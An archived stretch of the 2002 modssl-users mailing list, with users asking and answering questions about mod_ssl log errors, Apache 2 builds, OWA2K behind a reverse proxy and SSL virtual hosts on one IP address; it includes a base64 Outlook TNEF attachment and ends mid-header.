Thread-Topic: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
Thread-Index: AcKBErpMY7mE/YaKT3KC9NGkam2UpgEYKXk5
From: "Frederic DONNAT" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic DONNAT" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C28573.BB160337
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

Hi,

I think you just have to change the "LogLevel" value in your =
conf/httpd.conf.
It seems to be set to error change this to alert or something else =
(there is some description in conf file).

Fred


-----Original Message-----
From:	Rhys Hopkins [mailto:rhys.hopkins@culver-tec.com]
Sent:	Thu 10/31/2002 1:09 PM
To:	'modssl-users@modssl.org'
Cc:=09
Subject:	SSL handshake interrupted by system [Hint: Stop button pressed =
in browser?!]

Hi,

I know this has been asked before, and I know I should RTFM, but can =
anyone
point me at the right configuration directives as to how to avoid =
getting
the following errors in my apache log file:

------

31 10:54:08 2002] [error] mod_ssl: SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[Thu Oct 31 10:54:08 2002] [error] System: Broken pipe (errno: 32)

-- and --

[Thu Oct 31 10:55:39 2002] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?!] (System error follows)
[Thu Oct 31 10:55:39 2002] [error] System: Connection reset by peer =
(errno:
104)

------


These occur _extremely_ frequently, and I am pretty sure this is the
"Internet Explorer Bug" where random images, css files etc. fail to load =
in
IE under https, since we have this problem too.=20

I am using Apache 1.3.26, mod_ssl 0.9.6g on Linux 2.2.16-SMP

Any help would be greatly appreciated.

Rhys.






------_=_NextPart_001_01C28573.BB160337
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64

eJ8+IgQJAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAUQAAAFJFOiBTU0wgaGFuZHNoYWtl
IGludGVycnVwdGVkIGJ5IHN5c3RlbSBbSGludDogU3RvcCBidXR0b24gcHJlc3NlZCBpbiBicm93
c2VyPyFdAPgcAQWAAwAOAAAA0gcLAAYACgAGAAIAAwD/AAEggAMADgAAANIHCwAGAAoABgACAAMA
/wABCYABACEAAAA3REU0NEJERUMzNUZGMDQyQUEyOEZGNTUyRkMwOEZEOACHBwEDkAYAUAwAADcA
AAADACYAAAAAAAMANgAAAAAAQAA5ADcDFrtzhcIBHgA9AAEAAAAFAAAAUkU6IAAAAAACAUcAAQAA
ADMAAABjPXVzO2E9IDtwPVpFTkNPRDtsPUVYQ0hBTkdFLVVMSVMtMDIxMTA2MDkwNjAyWi00MgAA
HgBJAAEAAABNAAAAU1NMIGhhbmRzaGFrZSBpbnRlcnJ1cHRlZCBieSBzeXN0ZW0gW0hpbnQ6IFN0
b3AgYnV0dG9uIHByZXNzZWQgaW4gYnJvd3Nlcj8hXQAAAABAAE4AAMepZNaAwgEeAFoAAQAAAA0A
AABSaHlzIEhvcGtpbnMAAAAAAgFbAAEAAABGAAAAAAAAAIErH6S+oxAZnW4A3QEPVAIAAAAAUmh5
cyBIb3BraW5zAFNNVFAAcmh5cy5ob3BraW5zQGN1bHZlci10ZWMuY29tAAAAAgFcAAEAAAAhAAAA
U01UUDpSSFlTLkhPUEtJTlNAQ1VMVkVSLVRFQy5DT00AAAAAHgBdAAEAAAANAAAAUmh5cyBIb3Br
aW5zAAAAAAIBXgABAAAARgAAAAAAAACBKx+kvqMQGZ1uAN0BD1QCAAAAAFJoeXMgSG9wa2lucwBT
TVRQAHJoeXMuaG9wa2luc0BjdWx2ZXItdGVjLmNvbQAAAAIBXwABAAAAIQAAAFNNVFA6UkhZUy5I
T1BLSU5TQENVTFZFUi1URUMuQ09NAAAAAB4AZgABAAAABQAAAFNNVFAAAAAAHgBnAAEAAAAcAAAA
cmh5cy5ob3BraW5zQGN1bHZlci10ZWMuY29tAB4AaAABAAAABQAAAFNNVFAAAAAAHgBpAAEAAAAc
AAAAcmh5cy5ob3BraW5zQGN1bHZlci10ZWMuY29tAB4AcAABAAAATQAAAFNTTCBoYW5kc2hha2Ug
aW50ZXJydXB0ZWQgYnkgc3lzdGVtIFtIaW50OiBTdG9wIGJ1dHRvbiBwcmVzc2VkIGluIGJyb3dz
ZXI/IV0AAAAAAgFxAAEAAAAbAAAAAcKBErpMY7mE/YaKT3KC9NGkam2UpgEYKXk5AB4AdAABAAAA
GgAAACdtb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZycAAAAeABoMAQAAABAAAABGcmVkZXJpYyBET05O
QVQAHgAdDgEAAABNAAAAU1NMIGhhbmRzaGFrZSBpbnRlcnJ1cHRlZCBieSBzeXN0ZW0gW0hpbnQ6
IFN0b3AgYnV0dG9uIHByZXNzZWQgaW4gYnJvd3Nlcj8hXQAAAAACAQkQAQAAAH4EAAB6BAAAhQcA
AExaRnVK8RaHAwAKAHJjcGcxMjXiMgNDdGV4BUEBAwH3/wqAAqQD5AcTAoAP8wBQBFY/CFUHshEl
DlEDAQIAY2jhCsBzZXQyBgAGwxEl9jMERhO3MBIsETMI7wn3tjsYHw4wNREiDGBjAFAzCwkBZDM2
FlALpiBIHGksCqIKhAqASSB0ImgLgGsgeQhgIGpMdXMFQBPgdmUd8G9SIBPRbmcfIWgfICIgTG9n
TGUfEGwi7CB2B0AKUCALgB5SBcAhBaBuZi9oAkBwZDouIbIuHYUFQBQQZW37BCAfQWIfIBQRHzIE
kANg/yGRH4YEAB8yB0AEkAVABbGucwNwFCAeEWckYGwUEHwgKB/hGCAhIAQgJlIgOwEABPRpAiAh
IiGyIGbZAxBlKSKlHSRGGCEdKtUdJC0r8k8FEGcLgAdA8wXQB5BzYR+wK/MqNgNwJjoMggfwaHkE
IEhv7HBrC4AEIFsAwAMQH0AkOnIuoS5oLvRAY6R1bB8Qci0OsGMiUTxtXR0kBmACMC40VGiBHoAx
MC8zMS8B0AIwFEAxOjA5IFDaTR0kVC/ALkMnBGEEELxsLR6wBJAwkDT0LgWwZGcnHSRDYy40MaV1
jGJqBZAyNVNTTB7hdm41EBPgayESDrAkgHV3BTAJgCPAeSMwLrAOsG1fL1Ac8DIhBgAfQHAjwHV7
AkAowXAYIAQQOfEhMWLlA2B3NXE/ITGVHSQc//xrbjzAJTQT4AQgI9AJ8D0lsHM5MDoBARAFsGUs
eyWwOOAgPvUd4DkACGBs4ToAUlRGTUEAO4EfYCcDkQBwHmBuZR0kcG/1OWEgKAFhJCEf8SxRIgCf
IaMsYAhwRJAosmRpGCD9OABpHxAEID/BH0EwMD9B/SWhdkQQOgAfsAJAJrEdJPsf4gIQbBewA/Am
wiSCBCD1ITFtOjBhCrAT0B8gF7D/JtApci4wK04thR0kMxAy0Ug6NTQzoDggM0Jd7y9QJHNOgARh
XzUhOxE4n/85rx0kOs873zzkJzAGsDpzsyR0STRzKVHlMqJPOADeIE2PTpdU5FKQQgNgUGA/U1EF
ICchJHE/IFKQMzIfViUrlkETTKxWnjU6M/8zwE5PT19Qbx0kOl9S71P/31UPVh9dX1g/CFBuQ4BG
gf8owWNRJBE6IVnQEoFaBR0kfTLgNFqtTI40BR/wJxFvdmMwsAXAXw7BGCAHgGzseV8pYBggcQpQ
AjBvMP1BBmFh8GNBAkA6MQhwJSXnJWIf8B0kIklQokOABUAcRXgLUEDRBcBCdWf9ILB3J2NF0F/g
A3AhIADA9R+wc0EAYwQRKXIEIBQg3zFAKWAvgR8yF7BhPFIdhfhFIHVf4BKBIgJ1MQCQ9G5jHyB3
HyAe9CVSY0DubwJgYeEfQG92MB0scJELHrAmskFKtDEuMy4MMjZBAF71IDAuOSwuNibQKMFMC4B1
eANeAHywLjE2LVNNelAdKkFDUB7gIJBisHd/QhMj0QnBRJBvMEqRY0FjPwcwOeEpyy6SKcuDvwp9
AYVAAAAeADUQAQAAAEcAAAA8QTlFRTAxMkMwNjg1Q0I0ODk4QTcwRUI0NTk0QTZDQTcxMkU3QzJA
ZXhjaGFuZ2UtdWxpcy51bGlzLnplbmNvZC5jb20+AAAeAEcQAQAAAA8AAABtZXNzYWdlL3JmYzgy
MgAACwDyEAEAAAAfAPMQAQAAALYAAABSAEUAJQAzAEEAIABTAFMATAAgAGgAYQBuAGQAcwBoAGEA
awBlACAAaQBuAHQAZQByAHIAdQBwAHQAZQBkACAAYgB5ACAAcwB5AHMAdABlAG0AIABbAEgAaQBu
AHQAJQAzAEEAIABTAHQAbwBwACAAYgB1AHQAdABvAG4AIABwAHIAZQBzAHMAZQBkACAAaQBuACAA
YgByAG8AdwBzAGUAcgAlADMARgAhAF0ALgBFAE0ATAAAAAAACwD2EAAAAABAAAcw0cEzYHOFwgFA
AAgwhYQxu3OFwgEDAN4/5AQAAAMA8T8JAAAAHgD4PwEAAAAQAAAARnJlZGVyaWMgRE9OTkFUAAIB
+T8BAAAAYAAAAAAAAADcp0DIwEIQGrS5CAArL+GCAQAAAAAAAAAvTz1aRU5DT0QvT1U9UFJFTUlF
UiBHUk9VUEUgQURNSU5JU1RSQVRJRi9DTj1SRUNJUElFTlRTL0NOPUZSRURFUklDAB4A+j8BAAAA
FQAAAFN5c3RlbSBBZG1pbmlzdHJhdG9yAAAAAAIB+z8BAAAAHgAAAAAAAADcp0DIwEIQGrS5CAAr
L+GCAQAAAAAAAAAuAAAAAwD9P+QEAAADABlAAAAAAAMAGkAAAAAAAwAdQAAAAAADAB5AAAAAAB4A
MEABAAAACQAAAEZSRURFUklDAAAAAB4AMUABAAAACQAAAEZSRURFUklDAAAAAB4AMkABAAAAHAAA
AHJoeXMuaG9wa2luc0BjdWx2ZXItdGVjLmNvbQAeADNAAQAAABwAAAByaHlzLmhvcGtpbnNAY3Vs
dmVyLXRlYy5jb20AHgA4QAEAAAAJAAAARlJFREVSSUMAAAAAHgA5QAEAAAACAAAALgAAAAsAKQAA
AAAACwAjAAAAAAADAAYQdzt9DgMABxBTBAAAAwAQEAAAAAADABEQAQAAAB4ACBABAAAAZQAAAEhJ
LElUSElOS1lPVUpVU1RIQVZFVE9DSEFOR0VUSEUiTE9HTEVWRUwiVkFMVUVJTllPVVJDT05GL0hU
VFBEQ09ORklUU0VFTVNUT0JFU0VUVE9FUlJPUkNIQU5HRVRISVNUT0EAAAAAAgF/AAEAAABHAAAA
PEE5RUUwMTJDMDY4NUNCNDg5OEE3MEVCNDU5NEE2Q0E3MTJFN0MyQGV4Y2hhbmdlLXVsaXMudWxp
cy56ZW5jb2QuY29tPgAA/Co=

------_=_NextPart_001_01C28573.BB160337--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov  6 13:59:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA12928; Wed, 6 Nov 2002 13:58:29 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mx1.kpmg.de id NAA12866; Wed, 6 Nov 2002 13:57:52 +0100 (MET)
Received: from debziexc01.de.kworld.kpmg.com (unverified) by mx1.kpmg.de
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Wed, 6 Nov 2002 13:57:46 +0100
Received: by debziexc01.de.kworld.kpmg.com with Internet Mail Service (5.5.2650.21)
	id ; Wed, 6 Nov 2002 13:57:46 +0100
Message-ID: <45A71B6D6EC4D411B4200002A50941BD9B0735@debnoexc31.de.kworld.kpmg.com>
From: "Paetsch, Christian (BearingPoint extern)"
	 
To: "'modssl-announce@modssl.org'" 
Subject: mod_ssl for apache2 2.0.43
Date: Wed, 6 Nov 2002 13:57:46 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain; charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Paetsch, Christian (BearingPoint extern)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I'm looking for the modul mod_ssl for the new apache 2.0.43 server running
on a window32 platform. 
I can only find information about the mod_ssl for apache 1.3. 
Can I still use the latest version of mod_ssl?

Thanks in advance.

Regard,


Christian Paetsch  |  BearingPoint  |  Berlin, Germany

Phone +49 30 88004 59 20   | Mobile +49 172 38 73 175   | Fax +49 30 88004
9755 592

www.bearingpoint.com  




--
The information in this email is confidential and may be legally privileged. Access to this email by anyone other than the intended addressee is unauthorized. If you are not the intended recipient of this message, any review, disclosure, copying, distribution, retention, or any action taken or omitted to be taken in reliance on it is prohibited and may be unlawful. If you are not the intended recipient, please reply to or forward a copy of this message to the sender and delete the message, any attachments, and any copies thereof from your system

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov  6 15:02:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA19824; Wed, 6 Nov 2002 15:01:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from tomts6-srv.bellnexxia.net id PAA19818; Wed, 6 Nov 2002 15:00:59 +0100 (MET)
Received: from sympatico.ca ([64.231.121.188]) by tomts6-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021106140057.IGFK7208.tomts6-srv.bellnexxia.net@sympatico.ca>;
          Wed, 6 Nov 2002 09:00:57 -0500
Message-ID: <3DC920F6.5020007@sympatico.ca>
Date: Wed, 06 Nov 2002 09:02:30 -0500
From: hunter 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1
MIME-Version: 1.0
To: modssl-users@modssl.org
CC: "'modssl-announce@modssl.org'" 
Subject: Re: mod_ssl for apache2 2.0.43
References: <45A71B6D6EC4D411B4200002A50941BD9B0735@debnoexc31.de.kworld.kpmg.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Paetsch, Christian (BearingPoint extern) wrote:

>Hello,
>
>I'm looking for the modul mod_ssl for the new apache 2.0.43 server running
>on a window32 platform. 
>I can only find information about the mod_ssl for apache 1.3. 
>Can I still use the latest version of mod_ssl?
>
>Thanks in advance.
>
>Regard,
>
>
>Christian Paetsch  |  BearingPoint  |  Berlin, Germany
>
>Phone +49 30 88004 59 20   | Mobile +49 172 38 73 175   | Fax +49 30 88004
>9755 592
>
>www.bearingpoint.com  
>
>
>
>
>--
>The information in this email is confidential and may be legally privileged. Access to this email by anyone other than the intended addressee is unauthorized. If you are not the intended recipient of this message, any review, disclosure, copying, distribution, retention, or any action taken or omitted to be taken in reliance on it is prohibited and may be unlawful. If you are not the intended recipient, please reply to or forward a copy of this message to the sender and delete the message, any attachments, and any copies thereof from your system
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>  
>
Christian,

- mod_ssl is built into Apache2 - it is included in the source.

You still need to build OpenSSL and place the build directly into the 
Apache source, but mod_ssl is there already.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 09:05:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA29748; Thu, 7 Nov 2002 09:04:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.trimble.co.nz id JAA29742; Thu, 7 Nov 2002 09:03:40 +0100 (MET)
Received: (qmail 2153 invoked from network); 7 Nov 2002 21:03:36 +1300
Received: from venus.trimble.co.nz (10.3.0.220)
  by pluto.trimble.co.nz with DES-CBC3-SHA encrypted SMTP; 7 Nov 2002 21:03:36 +1300
Received: (qmail 6339 invoked by uid 403); 7 Nov 2002 21:03:36 +1300
Received: from jhaar@trimble.co.nz by venus.trimble.co.nz by uid 400 with qmail-scanner-1.15 
 (trophie: 5.500-0829/365/48052. sophie: 2.10/3.61. spamassassin: 2.31.  Clear:. 
 Processed in 0.446109 secs); 07 Nov 2002 08:03:36 -0000
Received: from crom.trimble.co.nz (10.3.0.198)
  by venus.trimble.co.nz with SMTP; 7 Nov 2002 21:03:35 +1300
Received: (qmail 27226 invoked by uid 500); 7 Nov 2002 08:03:35 -0000
Date: Thu, 7 Nov 2002 21:03:35 +1300
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Is anyone successfully runnin OWA2K behind Apache/mod_ssl?
Message-ID: <20021107080335.GB26837@trimble.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Organization: Trimble Navigation New Zealand Ltd.
User-Agent: Mutt/1.5.1i
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/2001/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We're using Apache/mod_ssl to provide a reverse-proxy to some backend Web
servers, and want to add OWA2K to the list (that's Outlook Web Access for
Microsoft Exchange 2000).

It works fine with OWA from Exchange 5.5 - which was basically just HTML
plus some javascript - but OWA2K (under IE5+) uses all sorts of whizzy M$
stuff, and doesn't work!

If you access OWA2K with a non-IE browser (e.g. Mozilla), OWA2K reverts to
the older format and works fine - it just doesn't work well from IE (ironic
isn't it :-)

It's pretty flakey. IE5.0 works pretty well, IE5.5 works 20% of the time and
IE6 just dies. It goes without saying that all these browsers work fine when
talking directly to the OWA2K server: it's only via the RP that they fail.

I've done packet sniffs and compares and can't see anything out of the
ordinary. I think it's an OWA issue, or an IE security-context issue, but
can't say for sure.

Anyone else got any stories about this?

Thanks

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 10:01:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA01276; Thu, 7 Nov 2002 10:00:29 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from fred.fred.com id JAA01126; Thu, 7 Nov 2002 09:59:07 +0100 (MET)
Message-Id: <200211070859.JAA01126@opensource.ee.ethz.ch>
Received: (qmail 7054 invoked from network); 7 Nov 2002 08:57:40 -0000
Received: from fred.com (HELO there) (192.168.0.125)
  by 0 with SMTP; 7 Nov 2002 08:57:40 -0000
Content-Type: text/plain;
  charset="iso-8859-15"
From: fred 
To: modssl-users@modssl.org
Subject: 2 ssl virtualhosts whith 1 IP
Date: Thu, 7 Nov 2002 09:57:40 +0100
X-Mailer: KMail [version 1.3.1]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: fred 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,
I use modssl with apache.
I have 10 virtualhosts on port 80
And 1 on port 443 whith ssl.
At this time, every thing is good.
I have only one IP adresse and I have to create another ssl virtualhost whith 
another ssl.crt file. 
when I go on : https://domaine1.com/ 
and https://domaine2.com/ 
I am on the good website but this is the same ssl.crt.

Is it possible to have 2 ssl.crt with 2 virtualhosts with only one IP ?

Thanks for your support.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 10:09:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA01882; Thu, 7 Nov 2002 10:08:23 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mx0.gmx.net id KAA01865; Thu, 7 Nov 2002 10:08:03 +0100 (MET)
Received: (qmail 9119 invoked by uid 0); 7 Nov 2002 09:07:58 -0000
Date: Thu, 7 Nov 2002 10:07:55 +0100 (MET)
From: Josef Kandlhofer 
To: modssl-users@modssl.org
MIME-Version: 1.0
References: <200211070859.JAA01126@opensource.ee.ethz.ch>
Subject: Re: 2 ssl virtualhosts whith 1 IP
X-Priority: 3 (Normal)
X-Authenticated-Sender: #0000557956@gmx.net
X-Authenticated-IP: [62.116.24.70]
Message-ID: <2368.1036660075@www61.gmx.net>
X-Mailer: WWW-Mail 1.6 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Josef Kandlhofer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> Is it possible to have 2 ssl.crt with 2 virtualhosts with only one IP ?

Only if u use different ports......

greetings,
josef

> 
> Thanks for your support.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 10:28:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA02691; Thu, 7 Nov 2002 10:27:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from fred.fred.com id KAA02686; Thu, 7 Nov 2002 10:26:43 +0100 (MET)
Message-Id: <200211070926.KAA02686@opensource.ee.ethz.ch>
Received: (qmail 7140 invoked from network); 7 Nov 2002 09:25:17 -0000
Received: from fred.com (HELO there) (192.168.0.125)
  by 0 with SMTP; 7 Nov 2002 09:25:17 -0000
Content-Type: text/plain;
  charset="iso-8859-1"
From: fred 
To: modssl-users@modssl.org
Subject: Re: 2 ssl virtualhosts whith 1 IP
Date: Thu, 7 Nov 2002 10:25:17 +0100
X-Mailer: KMail [version 1.3.1]
References: <200211070859.JAA01126@opensource.ee.ethz.ch> <2368.1036660075@www61.gmx.net>
In-Reply-To: <2368.1036660075@www61.gmx.net>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: fred 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thank you.
Is it possible to use Rewrite to redirect request from:
https://domaine1.com/something/page.ext?var1=val1&var2=val2
to
https://domaine1.com:444/something/page.ext?var1=val1&var2=val2

I have try :
RewriteEngine On
RewriteCond %{SERVER_PORT}      ^443$
RewriteCond %{SERVER_NAME}      ^https://domaine1.com$
RewriteRule ^/$                 https://domaine1.com:444 [L,R]

But it doesn't work.
Thank you very mutch for your support.


On Thursday 7 November 2002 10:07, you wrote:
> > Is it possible to have 2 ssl.crt with 2 virtualhosts with only one IP ?
>
> Only if u use different ports......
>
> greetings,
> josef
>
> > Thanks for your support.
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 10:47:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA03317; Thu, 7 Nov 2002 10:46:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id KAA03306; Thu, 7 Nov 2002 10:45:19 +0100 (MET)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gA79iwq23790
	for ; Thu, 7 Nov 2002 09:45:03 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Thu, 7 Nov 2002 09:44:53 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F22D5@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Is anyone successfully runnin OWA2K behind Apache/mod_ssl?
Date: Thu, 7 Nov 2002 09:44:42 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I had a discussion with someone about this off the list, but we didn't
resolve it. Until recently we too used a reverse proxy to connect to
Exchange 5.5, but this became too much hassle to keep up. 

How about turning off keep-alives on the Exchange 2000 server? This might
help, as keep-alives don't give very much performance advantage anyway.
After all, the apache-mod_ssl server will have keep-alives disabled (or
should do).

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If we could learn one thing from September 11th 2001, it would be the utter
absurdity of moral relativism.


> -----Original Message-----
> From: Jason Haar [mailto:Jason.Haar@trimble.co.nz]
> Sent: 07 November 2002 08:04
> To: modssl-users@modssl.org
> Subject: Is anyone successfully runnin OWA2K behind Apache/mod_ssl?
> 
> 
> We're using Apache/mod_ssl to provide a reverse-proxy to some 
> backend Web
> servers, and want to add OWA2K to the list (that's Outlook 
> Web Access for
> Microsoft Exchange 2000).
> 
> It works fine with OWA from Exchange 5.5 - which was 
> basically just HTML
> plus some javascript - but OWA2K (under IE5+) uses all sorts 
> of whizzy M$
> stuff, and doesn't work!
> 
> If you access OWA2K with a non-IE browser (e.g. Mozilla), 
> OWA2K reverts to
> the older format and works fine - it just doesn't work well 
> from IE (ironic
> isn't it :-)
> 
> It's pretty flakey. IE5.0 works pretty well, IE5.5 works 20% 
> of the time and
> IE6 just dies. It goes without saying that all these browsers 
> work fine when
> talking directly to the OWA2K server: it's only via the RP 
> that they fail.
> 
> I've done packet sniffs and compares and can't see anything out of the
> ordinary. I think it's an OWA issue, or an IE 
> security-context issue, but
> can't say for sure.
> 
> Anyone else got any stories about this?
> 
> Thanks
> 
> -- 
> Cheers
> 
> Jason Haar
> Information Security Manager, Trimble Navigation Ltd.
> Phone: +64 3 9635 377 Fax: +64 3 9635 417
> PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 10:53:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA03463; Thu, 7 Nov 2002 10:52:18 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id KAA03456; Thu, 7 Nov 2002 10:51:08 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gA79p7t9007696
	for ; Thu, 7 Nov 2002 10:51:07 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org ([127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gA79p6OP009037
	for ; Thu, 7 Nov 2002 10:51:07 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
